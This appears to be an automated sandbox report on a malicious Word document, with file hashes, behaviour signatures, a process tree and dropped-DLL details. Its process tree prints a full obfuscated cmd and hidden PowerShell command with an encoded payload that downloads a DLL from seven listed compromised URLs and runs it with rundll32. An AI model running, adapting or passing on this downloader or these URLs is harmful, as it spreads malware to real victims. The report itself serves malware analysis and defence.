Analysis

  • max time kernel
    70s
  • max time network
    111s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    13-01-2021 19:12

General

  • Target

    DOC_1301_U_92121711.doc

  • Size

    158KB

  • MD5

    7f013028b389d513b3ecdb0314a8e565

  • SHA1

    6ab79010a6d9ceef32f6c7429a20fab9c2b3e161

  • SHA256

    1186bddeaa3cf409c79c698387ea235caec1d0f737790405f6cc12f64b90b5e5

  • SHA512

    38ca252877b342847d90fa20962ac9097038699b46645474eef57a31c12ac873ba56f64fe39cf576315442e8e232877d519e1be3d857daa679a7798ac2a96680

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://smkbudiagung.com/wp-content/VoPg04/

exe.dropper

https://ats-tx.com/old/f1X/

exe.dropper

http://avanttipisos.com.br/catalogo-virtual/U/

exe.dropper

http://mpeakecreations.co.za/cgi-bin/vVk1rw/

exe.dropper

http://adres-ug.ru/wp-admin/IItD/

exe.dropper

https://theraven.pk/overwolf-r6-vdace/UH4fL/

exe.dropper

http://bhar.com.br/elementos/MQfB/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 9 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DOC_1301_U_92121711.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1640
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBlAHQAIAAoACcAVgA4AEUAJwArACcARwA1AEgAJwApACAAKABbAHQAWQBwAEUAXQAoACIAewA1AH0AewAxAH0AewAzAH0AewAwAH0AewA0AH0AewAyAH0AIgAtAGYAIAAnAE0ALgBpAE8ALgBkAGkAUgBFAEMAdABvACcALAAnAHkAcwAnACwAJwBZACcALAAnAFQAZQAnACwAJwByACcALAAnAFMAJwApACAAIAApACAAIAA7AHMARQBUAC0AaQB0AEUAbQAgACgAIgBWAGEAIgArACIAcgBJAGEAYgBsACIAKwAiAGUAIgArACIAOgB5AGYAVwA1AGoATQAiACkAIAAoAFsAdABZAHAAZQBdACgAIgB7ADEAfQB7ADUAfQB7ADQAfQB7ADcAfQB7ADMAfQB7ADAAfQB7ADIAfQB7ADYAfQAiACAALQBGACAAJwBOACcALAAnAHMAeQAnACwAJwB0AG0AYQAnACwAJwBQAG8ASQAnACwAJwBFAE0ALgBOAGUAdAAuAFMARQByACcALAAnAFMAdAAnACwAJwBOAEEARwBFAFIAJwAsACcAdgBpAGMARQAnACkAIAAgACkAOwAgACQARgBmADcAYQBvAGkAeAA9ACQASgAxADgARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAWAA5ADUATQA7ACQAVAAxADAAUQA9ACgAJwBEADcAJwArACcAXwBUACcAKQA7ACAAIAAoACAAIABJAHQARQBtACAAIAAoACIAVgBBAHIASQAiACsAIgBhACIAKwAiAGIATABFADoAIgArACIAVgA4AEUAZwA1AEgAIgApACAAKQAuAHYAQQBsAFUARQA6ADoAIgBjAHIARQBgAEEAYABUAGUARABpAFIAZQBjAHQAYABPAFIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAbQB1ACcAKwAnAEEATwAxAHIAJwArACcAeABsADkAJwApACsAKAAnAHQAJwArACcAbQB1AEEASwAnACsAJwAyACcAKQArACcAaQBqACcAKwAnAGkAJwArACgAJwB0AGwAJwArACcAbQAnACkAKwAnAHUAQQAnACkALgAiAFIAZQBwAGAAbABhAEMAZQAiACgAKAAnAG0AJwArACcAdQBBACcAKQAsACcAXAAnACkAKQApADsAJABCADkAOQBHAD0AKAAoACcAQgBfACcAKwAnADkAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAQQByAEkAQQBiAGwARQAgACAAKAAiAFkARgBXADUASgAiACsAIgBNACIAKQApAC4AVgBBAEwAdQBlADoAOgAiAHMARQBgAEMAYABVAFIAaQB0AFkAcABgAFIATwBgAFQAbwBDAE8ATAAiACAAPQAgACgAJwBUACcAKwAoACcAbABzADEAJwArACcAMgAnACkAKQA7ACQAVQA4ADAASAA9ACgAKAAnAEgAJwArACcANgA1ACcAKQArACcAWgAnACkAOwAkAEYAdAAxAG4AcgBoAGIAIAA9ACAAKAAnAFkAMQAnACsAJwAyAFMAJwApADsAJABNADkAOQBDAD0AKAAoACcAUgAnACsAJwA0ADkAJwApACsAJwBFACcAKQA7ACQASgBpADMAbAA1AHUAcgA9ACQASABPAE0ARQArACgAKAAnAGEAdQAnACsAKAAnADQAJwArACcATwAxACcAKQArACcAcgAnACsAJwB4AGwAJwArACgAJwA5ACcAKwAnAHQAYQB1ADQAJwArACcASwAyAGkAJwApACsAKAAnAGoAJwArACcAaQB0ACcAKQArACgAJwBsAGEAdQAnACsAJwA0ACcAKQApAC4AIgBSAEUAYABwAGAATABhAEMARQAiACgAKAAnAGEAJwArACcAdQA0ACcAKQAsACcAXAAnACkAKQArACQARgB0ADEAbgByAGgAYgArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAE8ANAA1AEUAPQAoACcAWQAnACsAKAAnADEAJwArACcANgBTACcAKQApADsAJABEADYAZgA4ADEAdgBqAD0AKAAnAEEAJwArACgAJwBdAFsAcQBbACcAKwAnAEQAJwApACsAJwBzACcAKwAoACcAOgAvAC8AJwArACcAcwAnACsAJwBtAGsAYgAnACsAJwB1AGQAaQBhAGcAdQBuAGcAJwArACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQAnACsAJwBjAG8AbgB0AGUAbgB0AC8AVgAnACsAJwBvACcAKQArACcAUABnACcAKwAoACcAMAA0ACcAKwAnAC8AJwApACsAKAAnAEAAJwArACcAQQBdACcAKQArACcAWwAnACsAKAAnAHEAJwArACcAWwBEAHMAJwApACsAKAAnADoALwAnACsAJwAvAGEAdABzAC0AdAAnACsAJwB4ACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AbwBsACcAKwAnAGQALwAnACkAKwAoACcAZgAxAFgALwAnACsAJwBAACcAKQArACgAJwBBAF0AWwBxAFsAJwArACcARAA6AC8ALwAnACsAJwBhACcAKQArACgAJwB2AGEAJwArACcAbgB0AHQAaQBwACcAKwAnAGkAcwBvACcAKQArACgAJwBzAC4AYwBvAG0ALgBiACcAKwAnAHIAJwArACcALwBjAGEAdABhAGwAJwArACcAbwBnAG8ALQAnACkAKwAoACcAdgAnACsAJwBpAHIAdAAnACkAKwAoACcAdQBhACcAKwAnAGwALwBVAC8AQABBAF0AJwArACcAWwBxAFsAJwArACcARAA6AC8AJwApACsAJwAvACcAKwAnAG0AJwArACgAJwBwAGUAYQBrACcAKwAnAGUAYwByAGUAJwApACsAJwBhACcAKwAoACcAdABpACcAKwAnAG8AbgBzACcAKwAnAC4AYwBvACcAKQArACcALgAnACsAKAAnAHoAYQAvACcAKwAnAGMAZwBpAC0AYgAnACsAJwBpAG4AJwApACsAKAAnAC8AdgBWAGsAMQAnACsAJwByAHcALwBAACcAKwAnAEEAXQAnACkAKwAoACcAWwBxACcAKwAnAFsARAAnACkAKwAoACcAOgAnACsAJwAvAC8AJwApACsAKAAnAGEAJwArACcAZAByAGUAcwAtAHUAZwAuAHIAdQAnACsAJwAvACcAKQArACcAdwAnACsAJwBwAC0AJwArACcAYQAnACsAKAAnAGQAbQBpACcAKwAnAG4ALwAnACkAKwAoACcASQAnACsAJwBJACcAKwAnAHQARAAvAEAAJwArACcAQQAnACsAJwBdAFsAcQBbAEQAcwAnACkAKwAnADoALwAnACsAJwAvAHQAJwArACgAJwBoACcAKwAnAGUAcgAnACkAKwAnAGEAJwArACgAJwB2AGUAbgAuAHAAJwArACcAawAvACcAKQArACgAJwBvAHYAZQAnACsAJwByAHcAbwAnACsAJwBsACcAKQArACgAJwBmAC0AcgA2ACcAKwAnAC0AdgBkAGEAJwArACcAYwBlACcAKQArACgAJwAvAFUASAA0AGYAJwArACcATAAnACsAJwAvAEAAJwApACsAKAAnAEEAXQAnACsAJwBbAHEAWwBEACcAKwAnADoALwAnACkAKwAoACcALwAnACsAJwBiAGgAJwApACsAKAAnAGEAcgAuACcAKwAnAGMAbwAnACkAKwAoACcAbQAuAGIAcgAnACsAJwAvAGUAbAAnACsAJwBlAG0AJwApACsAKAAnAGUAbgB0ACcAKwAnAG8AJwArACcAcwAvAE0AUQAnACkAKwAoACcAZgBCACcAKwAnAC8AJwApACkALgAiAFIAZQBwAGwAYABBAGAAQwBFACIAKAAoACgAJwBBAF0AWwBxACcAKwAnAFsAJwApACsAJwBEACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAJwBkACcAKwAoACcAcwBlAHcAJwArACcAZgAnACkAKQAsACgAKAAnAHcAJwArACcAZQB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQBlACcAKwAnAGYAJwApACsAJwBmACcAKQAsACgAJwBoAHQAJwArACcAdABwACcAKQApAFsAMgBdACkALgAiAHMAcABMAGAAaQBUACIAKAAkAEIAMgA3AEEAIAArACAAJABGAGYANwBhAG8AaQB4ACAAKwAgACQAUAAyAF8AQwApADsAJABBADgAMQBCAD0AKAAnAEgAMgAnACsAJwA3AFcAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABRAHQAeAAwAGcAMgB4ACAAaQBuACAAJABEADYAZgA4ADEAdgBqACkAewB0AHIAeQB7ACgALgAoACcATgAnACsAJwBlACcAKwAnAHcALQBPAGIAagBlAGMAdAAnACkAIABTAHkAUwB0AEUATQAuAE4ARQB0AC4AdwBFAEIAYwBsAEkAZQBuAFQAKQAuACIARABPAGAAdwBOAEwATwBhAGQARgBgAEkAYABsAEUAIgAoACQAUQB0AHgAMABnADIAeAAsACAAJABKAGkAMwBsADUAdQByACkAOwAkAEwAXwA4AFQAPQAoACgAJwBZADEAJwArACcANAAnACkAKwAnAEUAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEoAaQAzAGwANQB1AHIAKQAuACIATABgAGUATgBHAGAAVABIACIAIAAtAGcAZQAgADQAMwA4ADUAOAApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABKAGkAMwBsADUAdQByACwAKAAnAFMAJwArACgAJwBoAG8AdwAnACsAJwBEACcAKQArACgAJwBpACcAKwAnAGEAbAAnACkAKwAoACcAbwBnACcAKwAnAEEAJwApACkALgAiAFQATwBzAGAAVAByAEkAYABOAGcAIgAoACkAOwAkAFAANQAwAEUAPQAoACgAJwBGACcAKwAnADkAOQAnACkAKwAnAE4AJwApADsAYgByAGUAYQBrADsAJABLADgAMQBNAD0AKAAoACcASQA1ACcAKwAnADgAJwApACsAJwBOACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASwA3ADcASwA9ACgAJwBOADkAJwArACcAXwBLACcAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1420
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1620
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc UwBlAHQAIAAoACcAVgA4AEUAJwArACcARwA1AEgAJwApACAAKABbAHQAWQBwAEUAXQAoACIAewA1AH0AewAxAH0AewAzAH0AewAwAH0AewA0AH0AewAyAH0AIgAtAGYAIAAnAE0ALgBpAE8ALgBkAGkAUgBFAEMAdABvACcALAAnAHkAcwAnACwAJwBZACcALAAnAFQAZQAnACwAJwByACcALAAnAFMAJwApACAAIAApACAAIAA7AHMARQBUAC0AaQB0AEUAbQAgACgAIgBWAGEAIgArACIAcgBJAGEAYgBsACIAKwAiAGUAIgArACIAOgB5AGYAVwA1AGoATQAiACkAIAAoAFsAdABZAHAAZQBdACgAIgB7ADEAfQB7ADUAfQB7ADQAfQB7ADcAfQB7ADMAfQB7ADAAfQB7ADIAfQB7ADYAfQAiACAALQBGACAAJwBOACcALAAnAHMAeQAnACwAJwB0AG0AYQAnACwAJwBQAG8ASQAnACwAJwBFAE0ALgBOAGUAdAAuAFMARQByACcALAAnAFMAdAAnACwAJwBOAEEARwBFAFIAJwAsACcAdgBpAGMARQAnACkAIAAgACkAOwAgACQARgBmADcAYQBvAGkAeAA9ACQASgAxADgARQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAWAA5ADUATQA7ACQAVAAxADAAUQA9ACgAJwBEADcAJwArACcAXwBUACcAKQA7ACAAIAAoACAAIABJAHQARQBtACAAIAAoACIAVgBBAHIASQAiACsAIgBhACIAKwAiAGIATABFADoAIgArACIAVgA4AEUAZwA1AEgAIgApACAAKQAuAHYAQQBsAFUARQA6ADoAIgBjAHIARQBgAEEAYABUAGUARABpAFIAZQBjAHQAYABPAFIAWQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAoACcAbQB1ACcAKwAnAEEATwAxAHIAJwArACcAeABsADkAJwApACsAKAAnAHQAJwArACcAbQB1AEEASwAnACsAJwAyACcAKQArACcAaQBqACcAKwAnAGkAJwArACgAJwB0AGwAJwArACcAbQAnACkAKwAnAHUAQQAnACkALgAiAFIAZQBwAGAAbABhAEMAZQAiACgAKAAnAG0AJwArACcAdQBBACcAKQAsACcAXAAnACkAKQApADsAJABCADkAOQBHAD0AKAAoACcAQgBfACcAKwAnADkAJwApACsAJwBaACcAKQA7ACAAKAAgAFYAQQByAEkAQQBiAGwARQAgACAAKAAiAFkARgBXADUASgAiACsAIgBNACIAKQApAC4AVgBBAEwAdQBlADoAOgAiAHMARQBgAEMAYABVAFIAaQB0AFkAcABgAFIATwBgAFQAbwBDAE8ATAAiACAAPQAgACgAJwBUACcAKwAoACcAbABzADEAJwArACcAMgAnACkAKQA7ACQAVQA4ADAASAA9ACgAKAAnAEgAJwArACcANgA1ACcAKQArACcAWgAnACkAOwAkAEYAdAAxAG4AcgBoAGIAIAA9ACAAKAAnAFkAMQAnACsAJwAyAFMAJwApADsAJABNADkAOQBDAD0AKAAoACcAUgAnACsAJwA0ADkAJwApACsAJwBFACcAKQA7ACQASgBpADMAbAA1AHUAcgA9ACQASABPAE0ARQArACgAKAAnAGEAdQAnACsAKAAnADQAJwArACcATwAxACcAKQArACcAcgAnACsAJwB4AGwAJwArACgAJwA5ACcAKwAnAHQAYQB1ADQAJwArACcASwAyAGkAJwApACsAKAAnAGoAJwArACcAaQB0ACcAKQArACgAJwBsAGEAdQAnACsAJwA0ACcAKQApAC4AIgBSAEUAYABwAGAATABhAEMARQAiACgAKAAnAGEAJwArACcAdQA0ACcAKQAsACcAXAAnACkAKQArACQARgB0ADEAbgByAGgAYgArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAE8ANAA1AEUAPQAoACcAWQAnACsAKAAnADEAJwArACcANgBTACcAKQApADsAJABEADYAZgA4ADEAdgBqAD0AKAAnAEEAJwArACgAJwBdAFsAcQBbACcAKwAnAEQAJwApACsAJwBzACcAKwAoACcAOgAvAC8AJwArACcAcwAnACsAJwBtAGsAYgAnACsAJwB1AGQAaQBhAGcAdQBuAGcAJwArACcALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQAnACsAJwBjAG8AbgB0AGUAbgB0AC8AVgAnACsAJwBvACcAKQArACcAUABnACcAKwAoACcAMAA0ACcAKwAnAC8AJwApACsAKAAnAEAAJwArACcAQQBdACcAKQArACcAWwAnACsAKAAnAHEAJwArACcAWwBEAHMAJwApACsAKAAnADoALwAnACsAJwAvAGEAdABzAC0AdAAnACsAJwB4ACcAKQArACgAJwAuAGMAbwAnACsAJwBtAC8AbwBsACcAKwAnAGQALwAnACkAKwAoACcAZgAxAFgALwAnACsAJwBAACcAKQArACgAJwBBAF0AWwBxAFsAJwArACcARAA6AC8ALwAnACsAJwBhACcAKQArACgAJwB2AGEAJwArACcAbgB0AHQAaQBwACcAKwAnAGkAcwBvACcAKQArACgAJwBzAC4AYwBvAG0ALgBiACcAKwAnAHIAJwArACcALwBjAGEAdABhAGwAJwArACcAbwBnAG8ALQAnACkAKwAoACcAdgAnACsAJwBpAHIAdAAnACkAKwAoACcAdQBhACcAKwAnAGwALwBVAC8AQABBAF0AJwArACcAWwBxAFsAJwArACcARAA6AC8AJwApACsAJwAvACcAKwAnAG0AJwArACgAJwBwAGUAYQBrACcAKwAnAGUAYwByAGUAJwApACsAJwBhACcAKwAoACcAdABpACcAKwAnAG8AbgBzACcAKwAnAC4AYwBvACcAKQArACcALgAnACsAKAAnAHoAYQAvACcAKwAnAGMAZwBpAC0AYgAnACsAJwBpAG4AJwApACsAKAAnAC8AdgBWAGsAMQAnACsAJwByAHcALwBAACcAKwAnAEEAXQAnACkAKwAoACcAWwBxACcAKwAnAFsARAAnACkAKwAoACcAOgAnACsAJwAvAC8AJwApACsAKAAnAGEAJwArACcAZAByAGUAcwAtAHUAZwAuAHIAdQAnACsAJwAvACcAKQArACcAdwAnACsAJwBwAC0AJwArACcAYQAnACsAKAAnAGQAbQBpACcAKwAnAG4ALwAnACkAKwAoACcASQAnACsAJwBJACcAKwAnAHQARAAvAEAAJwArACcAQQAnACsAJwBdAFsAcQBbAEQAcwAnACkAKwAnADoALwAnACsAJwAvAHQAJwArACgAJwBoACcAKwAnAGUAcgAnACkAKwAnAGEAJwArACgAJwB2AGUAbgAuAHAAJwArACcAawAvACcAKQArACgAJwBvAHYAZQAnACsAJwByAHcAbwAnACsAJwBsACcAKQArACgAJwBmAC0AcgA2ACcAKwAnAC0AdgBkAGEAJwArACcAYwBlACcAKQArACgAJwAvAFUASAA0AGYAJwArACcATAAnACsAJwAvAEAAJwApACsAKAAnAEEAXQAnACsAJwBbAHEAWwBEACcAKwAnADoALwAnACkAKwAoACcALwAnACsAJwBiAGgAJwApACsAKAAnAGEAcgAuACcAKwAnAGMAbwAnACkAKwAoACcAbQAuAGIAcgAnACsAJwAvAGUAbAAnACsAJwBlAG0AJwApACsAKAAnAGUAbgB0ACcAKwAnAG8AJwArACcAcwAvAE0AUQAnACkAKwAoACcAZgBCACcAKwAnAC8AJwApACkALgAiAFIAZQBwAGwAYABBAGAAQwBFACIAKAAoACgAJwBBAF0AWwBxACcAKwAnAFsAJwApACsAJwBEACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACgAJwBkACcAKwAoACcAcwBlAHcAJwArACcAZgAnACkAKQAsACgAKAAnAHcAJwArACcAZQB2ACcAKQArACcAdwBlACcAKQApACwAKAAoACcAYQBlACcAKwAnAGYAJwApACsAJwBmACcAKQAsACgAJwBoAHQAJwArACcAdABwACcAKQApAFsAMgBdACkALgAiAHMAcABMAGAAaQBUACIAKAAkAEIAMgA3AEEAIAArACAAJABGAGYANwBhAG8AaQB4ACAAKwAgACQAUAAyAF8AQwApADsAJABBADgAMQBCAD0AKAAnAEgAMgAnACsAJwA3AFcAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABRAHQAeAAwAGcAMgB4ACAAaQBuACAAJABEADYAZgA4ADEAdgBqACkAewB0AHIAeQB7ACgALgAoACcATgAnACsAJwBlACcAKwAnAHcALQBPAGIAagBlAGMAdAAnACkAIABTAHkAUwB0AEUATQAuAE4ARQB0AC4AdwBFAEIAYwBsAEkAZQBuAFQAKQAuACIARABPAGAAdwBOAEwATwBhAGQARgBgAEkAYABsAEUAIgAoACQAUQB0AHgAMABnADIAeAAsACAAJABKAGkAMwBsADUAdQByACkAOwAkAEwAXwA4AFQAPQAoACgAJwBZADEAJwArACcANAAnACkAKwAnAEUAJwApADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEoAaQAzAGwANQB1AHIAKQAuACIATABgAGUATgBHAGAAVABIACIAIAAtAGcAZQAgADQAMwA4ADUAOAApACAAewAmACgAJwByAHUAJwArACcAbgBkAGwAbAAnACsAJwAzADIAJwApACAAJABKAGkAMwBsADUAdQByACwAKAAnAFMAJwArACgAJwBoAG8AdwAnACsAJwBEACcAKQArACgAJwBpACcAKwAnAGEAbAAnACkAKwAoACcAbwBnACcAKwAnAEEAJwApACkALgAiAFQATwBzAGAAVAByAEkAYABOAGcAIgAoACkAOwAkAFAANQAwAEUAPQAoACgAJwBGACcAKwAnADkAOQAnACkAKwAnAE4AJwApADsAYgByAGUAYQBrADsAJABLADgAMQBNAD0AKAAoACcASQA1ACcAKwAnADgAJwApACsAJwBOACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQASwA3ADcASwA9ACgAJwBOADkAJwArACcAXwBLACcAKQA=
        2⤵
        • Blocklisted process makes network request
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\O1rxl9t\K2ijitl\Y12S.dll ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1432
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\O1rxl9t\K2ijitl\Y12S.dll ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:1436
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cocyhqispx\nccnibnct.yqy",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:1592

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\O1rxl9t\K2ijitl\Y12S.dll
      MD5

      5032f80ceafaf8c8db591237c73d0083

      SHA1

      45e7751e9686f496192787550acd7fe98549ee71

      SHA256

      47417de1d6568ee9601025f44fcad3d1bf24d259a3f8ff3ecab00a7efb8df652

      SHA512

      dfcebdc33b9e1b622f2af6aa882f5f7574365383e222c2e9041d88f616456682d207d76f7765f6f9abd77dae82a7f8c8982fabd374ee3cd0c3efaf71f6bf9c98

    • \Users\Admin\O1rxl9t\K2ijitl\Y12S.dll
      MD5

      5032f80ceafaf8c8db591237c73d0083

      SHA1

      45e7751e9686f496192787550acd7fe98549ee71

      SHA256

      47417de1d6568ee9601025f44fcad3d1bf24d259a3f8ff3ecab00a7efb8df652

      SHA512

      dfcebdc33b9e1b622f2af6aa882f5f7574365383e222c2e9041d88f616456682d207d76f7765f6f9abd77dae82a7f8c8982fabd374ee3cd0c3efaf71f6bf9c98

    • \Users\Admin\O1rxl9t\K2ijitl\Y12S.dll
      MD5

      5032f80ceafaf8c8db591237c73d0083

      SHA1

      45e7751e9686f496192787550acd7fe98549ee71

      SHA256

      47417de1d6568ee9601025f44fcad3d1bf24d259a3f8ff3ecab00a7efb8df652

      SHA512

      dfcebdc33b9e1b622f2af6aa882f5f7574365383e222c2e9041d88f616456682d207d76f7765f6f9abd77dae82a7f8c8982fabd374ee3cd0c3efaf71f6bf9c98

    • \Users\Admin\O1rxl9t\K2ijitl\Y12S.dll
      MD5

      5032f80ceafaf8c8db591237c73d0083

      SHA1

      45e7751e9686f496192787550acd7fe98549ee71

      SHA256

      47417de1d6568ee9601025f44fcad3d1bf24d259a3f8ff3ecab00a7efb8df652

      SHA512

      dfcebdc33b9e1b622f2af6aa882f5f7574365383e222c2e9041d88f616456682d207d76f7765f6f9abd77dae82a7f8c8982fabd374ee3cd0c3efaf71f6bf9c98

    • \Users\Admin\O1rxl9t\K2ijitl\Y12S.dll
      MD5

      5032f80ceafaf8c8db591237c73d0083

      SHA1

      45e7751e9686f496192787550acd7fe98549ee71

      SHA256

      47417de1d6568ee9601025f44fcad3d1bf24d259a3f8ff3ecab00a7efb8df652

      SHA512

      dfcebdc33b9e1b622f2af6aa882f5f7574365383e222c2e9041d88f616456682d207d76f7765f6f9abd77dae82a7f8c8982fabd374ee3cd0c3efaf71f6bf9c98

    • memory/1432-13-0x0000000000000000-mapping.dmp
    • memory/1436-15-0x0000000000000000-mapping.dmp
    • memory/1592-20-0x0000000000000000-mapping.dmp
    • memory/1612-7-0x0000000002270000-0x0000000002271000-memory.dmp
      Filesize

      4KB

    • memory/1612-11-0x000000001C230000-0x000000001C231000-memory.dmp
      Filesize

      4KB

    • memory/1612-12-0x000000001C300000-0x000000001C301000-memory.dmp
      Filesize

      4KB

    • memory/1612-10-0x0000000002580000-0x0000000002581000-memory.dmp
      Filesize

      4KB

    • memory/1612-9-0x00000000024C0000-0x00000000024C1000-memory.dmp
      Filesize

      4KB

    • memory/1612-8-0x000000001AB10000-0x000000001AB11000-memory.dmp
      Filesize

      4KB

    • memory/1612-6-0x000007FEF55B0000-0x000007FEF5F9C000-memory.dmp
      Filesize

      9.9MB

    • memory/1612-5-0x0000000000000000-mapping.dmp
    • memory/1620-4-0x0000000000000000-mapping.dmp
    • memory/1620-21-0x000007FEF7B10000-0x000007FEF7D8A000-memory.dmp
      Filesize

      2.5MB

    • memory/1640-2-0x00000000005E4000-0x00000000005E8000-memory.dmp
      Filesize

      16KB

    • memory/1640-3-0x00000000005E4000-0x00000000005E8000-memory.dmp
      Filesize

      16KB